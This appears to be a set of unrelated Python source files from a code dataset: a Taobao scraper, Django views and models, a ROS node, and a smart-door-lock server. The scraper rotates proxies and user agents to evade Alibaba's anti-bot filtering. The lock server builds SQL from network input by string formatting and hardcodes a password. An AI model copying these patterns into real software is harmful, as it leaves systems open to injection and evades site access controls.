通过phantomjs来获取url的body\n :return: data str类型\n '''\n self.from_ip_pool_set_proxy_ip_to_phantomjs()\n try:\n self.driver.set_page_load_timeout(15) # 设置成10秒避免数据出错\n except:\n return {}\n\n try:\n self.driver.get(url)\n self.driver.implicitly_wait(20) # 隐式等待和显式等待可以同时使用\n\n main_body = self.driver.page_source\n main_body = re.compile(r'\\n').sub('', main_body)\n main_body = re.compile(r'\\t').sub('', main_body)\n main_body = re.compile(r' ').sub('', main_body)\n # print(main_body)\n data = re.compile(r'\\((.*)\\)').findall(main_body)[0] # 贪婪匹配匹配所有\n # print(data)\n except Exception as e: # 如果超时, 终止加载并继续后续操作\n print('-->>time out after 15 seconds when loading page')\n print('报错如下: ', e)\n # self.driver.execute_script('window.stop()') # 当页面加载时间超过设定时间,通过执行Javascript来stop加载,即可执行后续动作\n print('data为空!')\n self.result_data = {} # 重置下,避免存入时影响下面爬取的赋值\n data = ''\n\n return data\n\n def get_sort_data_list(self, body):\n '''\n 获取到分类的list(对应name和extQuery的值的list)\n :param body: 待转换的json\n :return: sort_data 类型 list\n '''\n try:\n sort_data = json.loads(body)\n except Exception:\n print('在获取分类信息的list时, json.loads转换出错, 此处跳过!')\n sort_data = {}\n\n try:\n sort_data = sort_data.get('data', [])\n except:\n print('获取分类信息data中的key值data出错!')\n sort_data = []\n\n return sort_data\n\n def get_tiantiantejia_goods_list(self, body):\n '''\n 将str类型的body转换为需求的list\n :param body:\n :return: a list\n '''\n try:\n data = json.loads(body)\n except Exception:\n print('在获取天天特价商品id的list时, json.loads转换出错, 此处跳过!')\n data = {}\n\n try:\n data = data.get('data', [])\n except Exception:\n print('获取data中的key值data出错!')\n data = []\n\n if data != []:\n # 处理得到需要的数据\n tejia_goods_list = [{\n 'goods_id': item.get('itemId', ''),\n 'start_time': self.deal_with_time_to_regulartime(item.get('activityStartTime', '')),\n 'end_time': self.deal_with_time_to_regulartime(item.get('activityEndTime', '')),\n } for item in data]\n else:\n tejia_goods_list = []\n\n return tejia_goods_list\n\n def deal_with_time_to_regulartime(self, tmp_time):\n '''\n 处理得到规范的时间\n :param tmp_time: str eg: '20171225000000'\n :return: str 规律的人眼可识别的时间 2609-03-15 14:03:20\n '''\n return tmp_time[0:4] + '-' + tmp_time[4:6] + '-' + tmp_time[6:8] + ' ' + tmp_time[8:10] + ':' + tmp_time[10:12] + ':' + tmp_time[12:14]\n\n def init_phantomjs(self):\n \"\"\"\n 初始化带cookie的驱动,之所以用phantomjs是因为其加载速度很快(快过chrome驱动太多)\n \"\"\"\n '''\n 研究发现, 必须以浏览器的形式进行访问才能返回需要的东西\n 常规requests模拟请求会被阿里服务器过滤, 并返回请求过于频繁的无用页面\n '''\n print('--->>>初始化phantomjs驱动中<<<---')\n cap = webdriver.DesiredCapabilities.PHANTOMJS\n cap['phantomjs.page.settings.resourceTimeout'] = 1000 # 1秒\n cap['phantomjs.page.settings.loadImages'] = False\n cap['phantomjs.page.settings.disk-cache'] = True\n cap['phantomjs.page.settings.userAgent'] = HEADERS[randint(0, 34)] # 随机一个请求头\n # cap['phantomjs.page.customHeaders.Cookie'] = cookies\n tmp_execute_path = EXECUTABLE_PATH\n\n self.driver = webdriver.PhantomJS(executable_path=tmp_execute_path, desired_capabilities=cap)\n\n wait = ui.WebDriverWait(self.driver, 20) # 显示等待n秒, 每过0.5检查一次页面是否加载完毕\n print('------->>>初始化完毕<<<-------')\n\n def from_ip_pool_set_proxy_ip_to_phantomjs(self):\n ip_list = self.get_proxy_ip_from_ip_pool().get('http')\n proxy_ip = ''\n try:\n proxy_ip = ip_list[randint(0, len(ip_list) - 1)] # 随机一个代理ip\n except Exception:\n print('从ip池获取随机ip失败...正在使用本机ip进行爬取!')\n # print('------>>>| 正在使用的代理ip: {} 进行爬取... |<<<------'.format(proxy_ip))\n proxy_ip = re.compile(r'http://').sub('', proxy_ip) # 过滤'http://'\n proxy_ip = proxy_ip.split(':') # 切割成['xxxx', '端口']\n\n try:\n tmp_js = {\n 'script': 'phantom.setProxy({}, {});'.format(proxy_ip[0], proxy_ip[1]),\n 'args': []\n }\n self.driver.command_executor._commands['executePhantomScript'] = ('POST', '/session/$sessionId/phantom/execute')\n self.driver.execute('executePhantomScript', tmp_js)\n except Exception:\n print('动态切换ip失败')\n pass\n\n def get_proxy_ip_from_ip_pool(self):\n '''\n 从代理ip池中获取到对应ip\n :return: dict类型 {'http': ['http://183.136.218.253:80', ...]}\n '''\n base_url = 'http://127.0.0.1:8000'\n result = requests.get(base_url).json()\n\n result_ip_list = {}\n result_ip_list['http'] = []\n for item in result:\n if item[2] > 7:\n tmp_url = 'http://' + str(item[0]) + ':' + str(item[1])\n result_ip_list['http'].append(tmp_url)\n else:\n delete_url = 'http://127.0.0.1:8000/delete?ip='\n delete_info = requests.get(delete_url + item[0])\n # pprint(result_ip_list)\n return result_ip_list\n\n def __del__(self):\n # self.driver.quit()\n gc.collect()\n\ndef daemon_init(stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):\n '''\n 杀掉父进程,独立子进程\n :param stdin:\n :param stdout:\n :param stderr:\n :return:\n '''\n sys.stdin = open(stdin, 'r')\n sys.stdout = open(stdout, 'a+')\n sys.stderr = open(stderr, 'a+')\n try:\n pid = os.fork()\n if pid > 0: # 父进程\n os._exit(0)\n except OSError as e:\n sys.stderr.write(\"first fork failed!!\" + e.strerror)\n os._exit(1)\n\n # 子进程, 由于父进程已经退出,所以子进程变为孤儿进程,由init收养\n '''setsid使子进程成为新的会话首进程,和进程组的组长,与原来的进程组、控制终端和登录会话脱离。'''\n os.setsid()\n '''防止在类似于临时挂载的文件系统下运行,例如/mnt文件夹下,这样守护进程一旦运行,临时挂载的文件系统就无法卸载了,这里我们推荐把当前工作目录切换到根目录下'''\n os.chdir(\"/\")\n '''设置用户创建文件的默认权限,设置的是权限“补码”,这里将文件权限掩码设为0,使得用户创建的文件具有最大的权限。否则,默认权限是从父进程继承得来的'''\n os.umask(0)\n\n try:\n pid = os.fork() # 第二次进行fork,为了防止会话首进程意外获得控制终端\n if pid > 0:\n os._exit(0) # 父进程退出\n except OSError as e:\n sys.stderr.write(\"second fork failed!!\" + e.strerror)\n os._exit(1)\n\n # 孙进程\n # for i in range(3, 64): # 关闭所有可能打开的不需要的文件,UNP中这样处理,但是发现在python中实现不需要。\n # os.close(i)\n sys.stdout.write(\"Daemon has been created! with pid: %d\\n\" % os.getpid())\n sys.stdout.flush() # 由于这里我们使用的是标准IO,这里应该是行缓冲或全缓冲,因此要调用flush,从内存中刷入日志文件。\n\ndef just_fuck_run():\n while True:\n print('一次大抓取即将开始'.center(30, '-'))\n taobao_tiantaintejia = TaoBaoTianTianTeJia()\n sort_data = taobao_tiantaintejia.get_all_goods_list()\n taobao_tiantaintejia.deal_with_all_goods_id(sort_data=sort_data)\n # try:\n # del taobao_tiantaintejia\n # except:\n # pass\n gc.collect()\n print('一次大抓取完毕, 即将重新开始'.center(30, '-'))\n sleep(60*5)\n\ndef main():\n '''\n 这里的思想是将其转换为孤儿进程,然后在后台运行\n :return:\n '''\n print('========主函数开始========') # 在调用daemon_init函数前是可以使用print到标准输出的,调用之后就要用把提示信息通过stdout发送到日志系统中了\n daemon_init() # 调用之后,你的程序已经成为了一个守护进程,可以执行自己的程序入口了\n print('--->>>| 孤儿进程成功被init回收成为单独进程!')\n # time.sleep(10) # daemon化自己的程序之后,sleep 10秒,模拟阻塞\n just_fuck_run()\n\n\nif __name__ == '__main__':\n if IS_BACKGROUND_RUNNING:\n main()\n else:\n just_fuck_run()","sub_path":"python网络数据采集/my_爬虫_进阶_之路/scrapy框架/my_spiders/电商项目集合/阿里1688_淘宝_天猫_京东_折800_卷皮_拼多多/my_flask_server/tejia/taobao_tiantiantejia.py","file_name":"taobao_tiantiantejia.py","file_ext":"py","file_size_in_byte":19717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407875007","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .forms import LoginForm, SignupForm\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http.response import HttpResponseRedirect\nfrom .models import Student\n# Create your views here.\ndef home(request):\n return render(request, 'app/home.html')\n\ndef user_login(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n fm = LoginForm(request=request, data=request.POST)\n if fm.is_valid():\n uname = fm.cleaned_data['username']\n upass = fm.cleaned_data['password']\n user = authenticate(username=uname,password=upass)\n if user is not None:\n login(request, user)\n messages.success(request, 'Logged In Successfully!!!')\n return HttpResponseRedirect('/dashboard/')\n else:\n fm = LoginForm()\n return render(request, 'app/login.html', {'form':fm})\n else:\n return HttpResponseRedirect('/dashboard/')\n\ndef user_signup(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n fm = SignupForm(request.POST)\n if fm.is_valid():\n messages.success(request,'Registered Successfully!!!')\n fm.save()\n fm = SignupForm()\n return HttpResponseRedirect('/login/')\n else:\n fm = SignupForm()\n return render(request, 'app/signup.html',{'form':fm})\n else:\n return HttpResponseRedirect('/dashboard/')\n\ndef user_logout(request):\n if request.user.is_authenticated:\n logout(request)\n messages.success(request, 'Logged Out Successfully!!!')\n return HttpResponseRedirect('/')\n else:\n return HttpResponseRedirect('/login/')\n\n\ndef preview(request):\n if request.user.is_authenticated:\n details = Student.objects.filter(user=request.user)\n if(details):\n data = details[0]\n else:\n data = {}\n return render(request, 'app/preview.html',{'data':data})\n else:\n return HttpResponseRedirect('/login/')\n\ndef dashboard(request):\n if request.user.is_authenticated:\n if request.method == \"POST\":\n student_details = Student.objects.filter(user=request.user)\n if(student_details):\n student_details = student_details[0]\n student_details.email = request.POST.get('email')\n student_details.fullname = request.POST.get('fullname')\n student_details.dob = request.POST.get('dob')\n student_details.adress = request.POST.get('adress')\n student_details.clgname = request.POST.get('clgname')\n student_details.clgyear = request.POST.get('clgyear')\n student_details.clgyear = request.POST.get('clgyear')\n student_details.clgcpi = request.POST.get('clgcpi')\n student_details.cls12name = request.POST.get('cls12name')\n student_details.cls12year = request.POST.get('cls12year')\n student_details.cls12cpi = request.POST.get('cls12cpi')\n student_details.cls10name = request.POST.get('cls10name')\n student_details.cls10year = request.POST.get('cls10year')\n student_details.cls10cpi = request.POST.get('cls10cpi')\n student_details.intrest = request.POST.get('intrest')\n student_details.planguages = request.POST.get('planguages')\n student_details.toolsandtech = request.POST.get('toolsandtech')\n student_details.projectname = request.POST.get('projectname')\n student_details.projectguide = request.POST.get('projectguide')\n student_details.projectdesc = request.POST.get('projectdesc')\n student_details.hobby1 = request.POST.get('hobby1')\n student_details.hobby2 = request.POST.get('hobby2')\n student_details.hobby3 = request.POST.get('hobby3')\n student_details.hobby4 = request.POST.get('hobby4')\n student_details.save()\n else:\n fullname = request.POST.get('fullname')\n email = request.POST.get('email')\n dob = request.POST.get('dob')\n adress = request.POST.get('adress')\n clgname = request.POST.get('clgname')\n clgyear = request.POST.get('clgyear')\n clgyear = request.POST.get('clgyear')\n clgcpi = request.POST.get('clgcpi')\n cls12name = request.POST.get('cls12name')\n cls12year = request.POST.get('cls12year')\n cls12cpi = request.POST.get('cls12cpi')\n cls10name = request.POST.get('cls10name')\n cls10year = request.POST.get('cls10year')\n cls10cpi = request.POST.get('cls10cpi')\n intrest = request.POST.get('intrest')\n planguages = request.POST.get('planguages')\n toolsandtech = request.POST.get('toolsandtech')\n projectname = request.POST.get('projectname')\n projectguide = request.POST.get('projectguide')\n projectdesc = request.POST.get('projectdesc')\n hobby1 = request.POST.get('hobby1')\n hobby2 = request.POST.get('hobby2')\n hobby3 = request.POST.get('hobby3')\n hobby4 = request.POST.get('hobby4')\n \n data = Student(user=request.user,fullname=fullname,email=email, dob=dob, adress=adress, clgname=clgname, clgyear=clgyear, clgcpi=clgcpi, cls12name=cls12name, cls12year=cls12year, cls12cpi=cls12cpi, cls10name=cls10name, cls10year=cls10year, cls10cpi=cls10cpi, intrest=intrest, planguages=planguages, toolsandtech=toolsandtech, projectname=projectname, projectguide=projectguide, projectdesc=projectdesc, hobby1=hobby1, hobby2=hobby2, hobby3=hobby3,hobby4=hobby4)\n\n data.save()\n messages.success(request, 'Saved Successfully!!!')\n return HttpResponseRedirect('/preview/')\n \n details = Student.objects.filter(user=request.user)\n if(details):\n data = details[0]\n else:\n data={}\n return render(request, 'app/dashboard.html',{'data':data})\n else:\n return HttpResponseRedirect('/login/')","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599863849","text":"#-*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils import timezone\nfrom datetime import datetime\n\nfrom PIL import Image, ImageOps\n\nIMAGE_THUMBNAIL_SIZE = (300, 300)\nSTAFF_THUMBNAIL_SIZE = (300, 300)\n\nCONTACTS = 'contacts'\nSTATE = 'ld_state'\nREGISTRATION = 'registr'\nRESULTS = 'results'\nMAP = 'map'\n\nSITE_CONTENT = (\n (CONTACTS, 'Контакти'),\n (STATE, 'ЛД: Положення'),\n (REGISTRATION, 'ЛД: Реєстрація'),\n (RESULTS, 'ЛД: Результати'),\n (MAP, 'ЛД: Траса'),\n)\n\nMEN_CATEGORIES = ('M18', 'M30', 'M40', 'M50', 'M60', 'M70')\nWOMEN_CATEGORIES = ('W18', 'W30', 'W40', 'W50', 'W60', 'W70')\n\nAGES_CATEGORIES_DICT = {\n MEN_CATEGORIES[0]: \"Ч 18-29\",\n MEN_CATEGORIES[1]: \"Ч 30-39\",\n MEN_CATEGORIES[2]: \"Ч 40-49\",\n MEN_CATEGORIES[3]: \"Ч 50-59\",\n MEN_CATEGORIES[4]: \"Ч 60-69\",\n MEN_CATEGORIES[5]: \"Ч 70 і старше\",\n WOMEN_CATEGORIES[0]: \"Ж 18-29\",\n WOMEN_CATEGORIES[1]: \"Ж 30-39\",\n WOMEN_CATEGORIES[2]: \"Ж 40-49\",\n WOMEN_CATEGORIES[3]: \"Ж 50-59\",\n WOMEN_CATEGORIES[4]: \"Ж 60-69\",\n WOMEN_CATEGORIES[5]: \"Ж 70 і старше\",\n}\n\nAGES_CATEGORIES = {\n (MEN_CATEGORIES[0], \"Ч 18-29\"),\n (MEN_CATEGORIES[1], \"Ч 30-39\"),\n (MEN_CATEGORIES[2], \"Ч 40-49\"),\n (MEN_CATEGORIES[3], \"Ч 50-59\"),\n (MEN_CATEGORIES[4], \"Ч 60-69\"),\n (MEN_CATEGORIES[5], \"Ч 70 і старше\"),\n (WOMEN_CATEGORIES[0], \"Ж 18-29\"),\n (WOMEN_CATEGORIES[1], \"Ж 30-39\"),\n (WOMEN_CATEGORIES[2], \"Ж 40-49\"),\n (WOMEN_CATEGORIES[3], \"Ж 50-59\"),\n (WOMEN_CATEGORIES[4], \"Ж 60-69\"),\n (WOMEN_CATEGORIES[5], \"Ж 70 і старше\"),\n}\n\ndef tuplify(x): return (x,x)\ncurrent_year = datetime.now().year\n\nYEARS = map(tuplify, range(1930, current_year + 1))\n\nclass Post(models.Model):\n title = models.CharField(verbose_name=\"Заголовок\", max_length=100)\n body = models.TextField(verbose_name=\"Зміст\")\n photo = models.ImageField(verbose_name=\"Зображення\", upload_to='photos/posts', blank=True)\n youtube_id = models.CharField(verbose_name=\"Youtube відео ІД\", blank=True, max_length=25, null=True)\n pub_date = models.DateTimeField(verbose_name=\"Дата публікації\")\n\n class Meta:\n ordering = ['-pub_date']\n verbose_name = \"Новина\"\n verbose_name_plural = \"Новини\"\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Saving small image in local disk\"\"\"\n self.pub_date = timezone.now()\n super(Post, self).save()\n if self.photo:\n image = Image.open(self.photo.path)\n image.thumbnail(IMAGE_THUMBNAIL_SIZE, Image.ANTIALIAS)\n image.save(self.photo.path)\n\n def __unicode__(self):\n return self.title\n\nclass Sponsor(models.Model):\n title = models.CharField(verbose_name=\"Назва\", max_length=50)\n photo = models.ImageField(verbose_name=\"Логотип\", upload_to='photos/sponsors', blank=True)\n url = models.URLField(verbose_name=\"Посилання\")\n order = models.IntegerField(verbose_name=\"Порядок\", default=0)\n\n class Meta:\n ordering = ['-order']\n verbose_name = \"Спонсор\\Партнер\"\n verbose_name_plural = \"Спонсори\\Партнери\"\n\n def __unicode__(self):\n return self.title\n\nclass TextInformation(models.Model):\n site = models.CharField(max_length=10, unique=True,\n verbose_name=\"Сторінка\",\n choices=SITE_CONTENT,\n default='contacts')\n body = models.TextField(verbose_name=\"Зміст\")\n\n class Meta:\n verbose_name = \"Текстова інформація для сторінок\"\n verbose_name_plural = \"Текстова інформація для сторінок\"\n\n def __unicode__(self):\n return self.site\n\n\nclass Staff(models.Model):\n name = models.CharField(verbose_name=\"Ім`я\", max_length=100)\n body = models.TextField(verbose_name=\"Біографічна довідка\")\n photo = models.ImageField(verbose_name=\"Фотографія\", upload_to='photos/staff', blank=True)\n order = models.IntegerField(verbose_name=\"Порядок\", default=0)\n\n class Meta:\n ordering = ['-order']\n verbose_name = \"Персонал\"\n verbose_name_plural = \"Персонал\"\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n self.pub_date = timezone.now()\n super(Staff, self).save()\n if self.photo:\n image = Image.open(self.photo.path)\n image = ImageOps.fit(image, STAFF_THUMBNAIL_SIZE, Image.ANTIALIAS)\n image.save(self.photo.path)\n\n def __unicode__(self):\n return self.name\n\nclass Runner(models.Model):\n name = models.CharField(verbose_name=\"Ім`я\", max_length=100)\n birth_year = models.IntegerField(verbose_name=\"Рік народження\", max_length=2, choices=YEARS)\n paid = models.BooleanField(verbose_name=\"Внесок оплачено\", default=False)\n city = models.CharField(verbose_name=\"Місто\", default='-', max_length=20)\n age_category = models.CharField(verbose_name=\"Вікова категорія\", default=MEN_CATEGORIES[0], choices=AGES_CATEGORIES, max_length=10)\n result = models.CharField(verbose_name=\"Результат\", max_length=100, blank=True)\n position = models.PositiveSmallIntegerField(verbose_name=\"Місце в ваговій категорії\", default=0, blank=True)\n pub_date = models.DateTimeField(verbose_name=\"Дата реєстрації\")\n\n class Meta:\n ordering = ['pub_date']\n verbose_name = \"Учасник\"\n verbose_name_plural = \"Учасники\"\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n if self.pub_date is None:\n self.pub_date = timezone.now()\n super(Runner, self).save()\n\n def __unicode__(self):\n return self.name","sub_path":"club_ultra/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"397173662","text":"#!/usr/bin/env python\n\nimport rospy\n\nfrom dynamic_reconfigure.server import Server\nfrom arduino_dynamic_reconfigure_proxy.cfg import TeensyConfig\n\n# Import the float array message\nfrom std_msgs.msg import Float32MultiArray\nfrom std_msgs.msg import MultiArrayLayout\nfrom std_msgs.msg import MultiArrayDimension\n\n\n\n\ndef callback(config, level):\n # rospy.loginfo(\"\"\"Reconfigure Request: {Motor_Master_Switch}, {motor_1}, {motor_2}, {motor_3}, {motor_4},\\\n # {Controller_ON_OFF}, {Roll_SetPoint}, {Pitch_SetPoint}, {Yaw_SetPoint}, {Pitch_Kp}, {Pitch_Kd}, {Pitch_Ki},\\\n # {Roll_Kp}, {Roll_Kd}, {Roll_Ki}, {Yaw_Kp}, {Yaw_Kd}, {Yaw_Ki},\"\"\".format(**config))\n # return config\n global pub\n if not rospy.is_shutdown():\n multfloatlayout = MultiArrayLayout([MultiArrayDimension('parameters',18,18)],0)\n multfloat = Float32MultiArray(multfloatlayout, [float(config.Motor_Master_Switch),\\\n config.motor_1,\\\n config.motor_2,\\\n config.motor_3,\\\n config.motor_4,\\\n float(config.Controller_ON_OFF),\\\n config.Roll_SetPoint,\\\n config.Pitch_SetPoint,\\\n config.Yaw_SetPoint,\\\n config.Pitch_Kp,\\\n config.Pitch_Kd,\\\n config.Pitch_Ki,\\\n config.Roll_Kp,\\\n config.Roll_Kd,\\\n config.Roll_Ki,\\\n config.Yaw_Kp,\\\n config.Yaw_Kd,\\\n config.Yaw_Ki])\n # array_float = [1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0]\n rospy.loginfo(multfloat)\n pub.publish(multfloat)\n return config\n\nif __name__ == \"__main__\":\n\n try:\n pub = rospy.Publisher('teensy_dynamic_reconfigure', Float32MultiArray, queue_size=10)\n rospy.init_node(\"arduino_dynamic_reconfigure_proxy\", anonymous = True)\n srv = Server(TeensyConfig, callback)\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n\n srv = Server(TeensyConfig, callback)\n rospy.spin()\n","sub_path":"Software/Rpi3 - Linux Processor/Ros nodes/arduino_dynamic_reconfigure_proxy/nodes/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555769295","text":"# Author: Martin Klamrowski\n# Last modified: 5/12/2018\n\nimport socket, time, sqlite3, logging, sys, threading, datetime\n\n\nclass ApplicationServer():\n \"\"\"\n This class models the behaviour of the server for the You Safe Bolt system. The\n communication protocol is described in the README.\n \n To run the server call run() on it.\n \"\"\" \n \n def __init__(self):\n \"\"\"\n Constructor.\n \n ApplicationServer.__init__() --> ApplicationServer\n \"\"\"\n self.ID = 'S'\n self.num_pics = 0\n self.pics_on_file = []\n \n # a client must provide this password to communicate with the server\n self.identify_password = \"biratkingofcomedy\" \n\n self.cmd_list = []\n self.client_sockets = []\n self.client_addresses = []\n \n # a static ip was set on the phone\n self.app_address = '192.168.0.250'\n self.app_port = 2001\n \n # initialize\n self.init_log()\n self.init_db() \n \n # server setup\n ADDRESS = '192.168.0.21'\n PORT = 8018 \n \n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind((ADDRESS, PORT))\n self.server_socket.listen(10)\n\n \n \n def init_db(self):\n \"\"\"\n Initializes the database for the ApplicationServer.\n - A .db file is created and formatted\n \n ApplicationServer.init_db() --> None\n \"\"\"\n conn = sqlite3.connect(\"server.db\")\n curr = conn.cursor()\n \n try:\n # note: Access_Level ranked low to high; 1 to 3 \n curr.execute('CREATE TABLE Users (Name TEXT, Pass INTEGER, Date_Added TEXT, Access_Level INTEGER, PRIMARY KEY (Pass))')\n \n except sqlite3.OperationalError:\n self.log_it(sys.exc_info(), self.ID) \n\n conn.commit()\n conn.close()\n \n \n \n def init_log(self):\n \"\"\"\n Initializes logging for the ApplicationServer.\n - A log file is opened/created\n - Creates a Logger object\n \n ApplicationServer.init_log() --> None\n \"\"\"\n logging.basicConfig( filename = \"server.log\",\n level = logging.DEBUG,\n format = \"\\%(asctime)s \\%(levelname)s \\%(identifier)s \\%(message)s\\n\"\n ) \n self.log = logging.getLogger() \n self.formatter = logging.Formatter(\"\\%(asctime)s \\%(levelname)s \\%(identifier)s \\%(message)s\\n\") \n\n\n \n def run(self):\n \"\"\"\n Main system loop.\n - DoorLock clients are handled in a new thread\n - New client connections and the app are handled in the main thread\n \n ApplicationServer.run() --> None\n \"\"\"\n print(\"DEBUG: running\")\n print(\"DEBUG: server is listening\")\n \n running = True\n while running:\n \n # listen for new connections\n client_socket, client_address = self.server_socket.accept() \n \n try:\n identify = client_socket.recv(4096)\n\n if identify:\n identify_hdr, identify_msg, identify_sdr = self.parse_packet(identify)\n identifier_type = self.client_type(identify_sdr)\n \n # super high-level security\n if identify_hdr == \"DATA\" and identify_msg == self.identify_password and self.client_type(identify_sdr): \n try: \n # if its a doorlock\n if identifier_type == \"D\":\n threading.Thread(target=self.client_thread, args=(client_socket, client_address, identify_sdr)).start()\n self.client_sockets.append(client_socket)\n self.client_addresses.append(client_address[0])\n \n except:\n self.log_it(sys.exc_info(), self.ID)\n print(\"DEBUG: could not create thread\")\n \n\n elif identify_sdr == \"M\":\n \"\"\"\n Handling of the mobile app is done here. The app was unable to send an identify so that isn't checked.\n \"\"\"\n print(\"DEBUG: connected to app at {}:{}\".format(client_address[0], client_address[1]))\n \n self.app_address = client_address[0]\n recv_hdr, recv_msg, recv_sdr = identify_hdr, identify_msg, identify_sdr\n \n # command\n if recv_hdr == \"CMD\": \n if recv_msg.startswith(\"LOCK DOOR\"): \n # get ready to lock door\n \n recv_msg, door_number = recv_msg.split('&') \n client_socket.sendall(self.make_packet(\"ACK\", \"LOCK DOOR&\" + door_number))\n \n # add command to client command list\n self.add_command((\"D{}\".format(door_number), self.make_packet(\"CMD\", \"LOCK DOOR\")))\n \n print(\"DEBUG: finished lock\")\n \n \n elif recv_msg.startswith(\"UNLOCK DOOR\"):\n # get ready to unlock door\n \n recv_msg, door_number = recv_msg.split('&')\n client_socket.sendall(self.make_packet(\"ACK\", \"UNLOCK DOOR&\" + door_number))\n \n # add command to client command list\n self.add_command((\"D{}\".format(door_number), self.make_packet(\"CMD\", \"UNLOCK DOOR\")))\n \n print(\"DEBUG: finished unlock\")\n \n\n elif recv_msg.startswith(\"ADD USER\"):\n # adding user to database\n \n recv_msg, user_data = recv_msg.split('&')\n self.add_db(user_data)\n \n\n elif recv_msg == \"SHUTTING DOWN\":\n # disconnect from app\n \n self.app_address = \"\"\n client_socket.close()\n\n else:\n client_socket.sendall(self.make_packet(\"ERROR\", \"IDENTIFY FAILED\")) \n \n except:\n print(\"DEBUG: could not talk with client\") \n \n self.server_socket.close()\n \n \n \n def client_thread(self, sock, address, ID):\n \"\"\"\n Handles the DoorLock client.\n \"\"\"\n print(\"DEBUG: connected to doorlock at {}:{}\".format(address[0], address[1])) \n sock.sendall(self.make_packet(\"DATA\", \"CONNECTED\"))\n \n # set to non blocking\n sock.setblocking(False)\n \n connected = True\n while connected:\n \n # send a pending command to the DoorLock\n if self.cmd_list:\n for cmd in self.cmd_list:\n if ID in cmd:\n sock.sendall(cmd[1])\n self.cmd_list.remove(cmd)\n break\n\n try:\n recv = sock.recv(4096)\n\n except:\n print(\"DEBUG: receive timed out\")\n \n else:\n if recv: \n recv_hdr, recv_msg, recv_sdr = self.parse_packet(recv)\n\n sock.setblocking(True) \n \n # command\n if recv_hdr == \"CMD\": \n if recv_msg == \"PIN CHECK\":\n # get ready to receive pin\n \n sock.sendall(self.make_packet(\"ACK\", \"PIN CHECK\")) \n \n pin = sock.recv(4096)\n \n if pin:\n pin_hdr, pin_msg, pin_sdr = self.parse_packet(pin)\n \n if pin_hdr == \"DATA\": \n name = self.search_db(int(pin_msg))\n \n if name:\n sock.sendall(self.make_packet(\"DATA\", name))\n \n else:\n sock.sendall(self.make_packet(\"DATA\", \"PIN CHECK FAIL\")) \n \n \n elif recv_msg == \"BUZZ\":\n \"\"\"\n ###INCOMPLETE (app was not able to receive picture)\n Send a notification + picture to the owner's phone\n - the picture is received from the respective doorlock client\n \"\"\"\n \n sock.sendall(self.make_packet(\"ACK\", \"BUZZ\"))\n \n # prepare to receive picture from client \n pic = sock.recv(1024)\n self.num_pics += 1\n pic_file = open(\"{}.png\".format(self.num_pics), 'wb')\n \n # Pi 1 is slow so need a loop to receive picture data\n sock.settimeout(1)\n\n try:\n while pic: \n pic_file.write(bytes(pic))\n pic = sock.recv(1024)\n \n except:\n print(\"DEBUG: picture receive ended, or timed out\")\n \n sock.sendall(self.make_packet(\"DATA\", \"PICTURE RECEIVED\"))\n\n self.pics_on_file.append(\"{}.png\".format(self.num_pics))\n pic_file.close()\n\n try:\n # attempt to connect to mobile app\n app_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n app_socket.connect((self.app_address, self.app_port))\n\n except:\n print(\"DEBUG: error, app was not available\")\n\n else:\n pic_file = open(\"{}.png\".format(self.num_pics), 'rb')\n pic_bytes = pic_file.read()\n\n try:\n app_socket.sendall(pic_bytes)\n\n except:\n print(\"DEBUG: error sending picture\")\n \n sock.setblocking(True)\n \n \n elif recv_msg == \"SHUTTING DOWN\":\n # disconnect from client\n \n self.client_sockets.remove(sock)\n self.client_addresses.remove(address[0])\n sock.close() \n print(\"DEBUG: shutting down\")\n connected = False\n \n elif recv_hdr == \"ERROR\":\n self.log_it(recv_msg, ID)\n\n\n##################################################\n # UTILITY FUNCTIONS\n################################################## \n \n def search_db(self, query):\n \"\"\"\n Returns result (name) of database search for given PIN.\n \n ApplicationServer.search_db(pin) --> str\n \"\"\"\n conn = sqlite3.connect(\"server.db\")\n curr = conn.cursor()\n \n curr.execute('SELECT Name FROM Users WHERE Pass = \"{}\" '.format(query))\n \n fetch = str(curr.fetchone())\n print(\"DEBUG: fetched -> {}\".format( fetch ))\n \n fetch = fetch.lstrip(\"('\")\n fetch = fetch.rstrip(\"',)\") \n \n conn.close()\n \n return fetch if fetch != \"None\" else \"\"\n\n\n\n def add_db(self, data):\n \"\"\"\n Adds to the database. User data is a string of the form \"name pin\".\n \n add_db(data) --> None\n \"\"\"\n conn = sqlite3.connect(\"server.db\")\n curr = conn.cursor()\n \n name, pin = data.split(\" \")\n \n try:\n curr.execute('INSERT INTO Users VALUES(\"{}\", {}, \"{}\", 1)'.format(name, pin, datetime.datetime.now()))\n \n except:\n print(\"DEBUG: user already existed\")\n \n conn.commit()\n conn.close()\n \n \n \n def make_packet(self, type, data):\n \"\"\"\n Returns a bytes packet in the form of \"HEADER\\\\x00MSG\\\\x00SENDER\".\n \n ApplicationServer.make_packet(header, msg) --> bytes\n \"\"\" \n return (\"{}\\x00{}\\x00{}\".format(type, data, self.ID)).encode()\n \n \n \n def parse_packet(self, data):\n \"\"\"\n Deconstructs a bytes packet.\n \n 